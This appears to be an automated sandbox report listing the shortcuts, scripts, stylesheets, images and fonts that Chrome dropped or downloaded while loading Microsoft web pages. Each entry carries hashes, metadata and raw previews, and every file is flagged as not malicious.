                                                                              Preview:L..................F.@.. ...$+.,........<@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IzY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VzY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VzY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VzY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VzY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............G4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2689
                                                                              Entropy (8bit):4.01439484999316
                                                                              Encrypted:false
                                                                              SSDEEP:48:82djTLTAHsidAKZdA14meh7sFiZUkmgqeh7s6ty+BX:86D9nqy
                                                                              MD5:5914FDBD6138793C22FE9C96786B9364
                                                                              SHA1:E6FAD7C08A399C5ABD4192B178EFB5ED5AA0B2A5
                                                                              SHA-256:7C9BAF60DD0BDE8BBB3756CB6B3982C9517529BC0190C55CABD521F0866151F3
                                                                              SHA-512:6C5E694CB5DEB358A005F758BDAF1F5B19544B90ABC6184F8A2DD453940C1ECDF3952EEC49EC819B60716434299A1A89424377036E5D1826E8DA109A7DAD17DD
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IzY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VzY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VzY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VzY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............G4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 26 18:54:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2677
                                                                              Entropy (8bit):4.00818777034918
                                                                              Encrypted:false
                                                                              SSDEEP:48:8QdjTLT7HsidAKZdA1TehDiZUkwqeh8ty+R:8oDr8y
                                                                              MD5:7C42AF02C8FD5A6826BC3B8B050110BA
                                                                              SHA1:A7206B66E7D527A76403F5C7B023CBB7A28FDEC2
                                                                              SHA-256:03D02F331566CB738920BC6494FFA01B867D931F841C0D9A531E41C078D8A6EF
                                                                              SHA-512:C939B21E0C036E221FD041670D3C981D0C1A9ABD466B0F7AAF0D6F470BB15861F09A8C73D1F433A3F4D98CE3540EF2D1FA098404B0F397AEC633B8A237EC0E53
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....`..<@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IzY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VzY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VzY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VzY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VzY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............G4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 26 18:54:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2677
                                                                              Entropy (8bit):3.999403465585425
                                                                              Encrypted:false
                                                                              SSDEEP:48:8PdjTLT7HsidAKZdA1dehBiZUk1W1qeh+ty+C:8BDL94y
                                                                              MD5:2F1861725EC14945C54A00CB6F4C1F11
                                                                              SHA1:F1D866AF9732297399708C91D8754D7A7A3B1E2F
                                                                              SHA-256:A2A42F6F5B18264C8B5B853341550FCF543AB58FCE8C33CE58D16D8BB44B3726
                                                                              SHA-512:8CFA9922306242E1FD0504B625E936E20760DE6290C787E580920A96E40D7E0D5EB34DDC04F83AFA987E1CE4AC1545897718F843CBA058ED7BAD0FF195504503
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,........<@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IzY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VzY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VzY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VzY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VzY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............G4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 26 18:54:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2679
                                                                              Entropy (8bit):4.004650210969623
                                                                              Encrypted:false
                                                                              SSDEEP:48:8HadjTLT7HsidAKZdA1duTeehOuTbbiZUk5OjqehOuTbUty+yT+:8WDPTfTbxWOvTbqy7T
                                                                              MD5:DA9399F8D8442E178531508042766AA5
                                                                              SHA1:1D9E367722DDDB552B27C0608FB29660EE3EC294
                                                                              SHA-256:BD56356C1A33F01B5603BB91A23B20D3DFEF0DE67F8D7FFBC7AF20711A3A122F
                                                                              SHA-512:84EA317E042C2C26F74EA7742DE716C8EA48214C4797E22CFCCFA4CCAB5C220FC657C12CFD0822367345FE0FADA679E1846F0731B6FE36997105677E54987DFD
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....t..<@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IzY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VzY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VzY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VzY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VzY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............G4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):15
                                                                              Entropy (8bit):3.189898095464287
                                                                              Encrypted:false
                                                                              SSDEEP:3:Uh1Kn:UDKn
                                                                              MD5:39A19D0882684989864FA50BCED6A2D1
                                                                              SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                              SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                              SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                              Preview:/* empty css */
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (32089)
                                                                              Category:dropped
                                                                              Size (bytes):92629
                                                                              Entropy (8bit):5.303443527492463
                                                                              Encrypted:false
                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):4054
                                                                              Entropy (8bit):7.797012573497454
                                                                              Encrypted:false
                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                              Category:dropped
                                                                              Size (bytes):17174
                                                                              Entropy (8bit):2.9129715116732746
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (41651)
                                                                              Category:downloaded
                                                                              Size (bytes):131537
                                                                              Entropy (8bit):5.2237799798561975
                                                                              Encrypted:false
                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (32089)
                                                                              Category:downloaded
                                                                              Size (bytes):92629
                                                                              Entropy (8bit):5.303443527492463
                                                                              Encrypted:false
                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):563851
                                                                              Entropy (8bit):5.221453271093944
                                                                              Encrypted:false
                                                                              SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                              MD5:12DD1E4D0485A80184B36D158018DE81
                                                                              SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                              SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                              SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                              Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:downloaded
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                              Category:downloaded
                                                                              Size (bytes):26288
                                                                              Entropy (8bit):7.984195877171481
                                                                              Encrypted:false
                                                                              SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                              MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                              SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                              SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                              SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
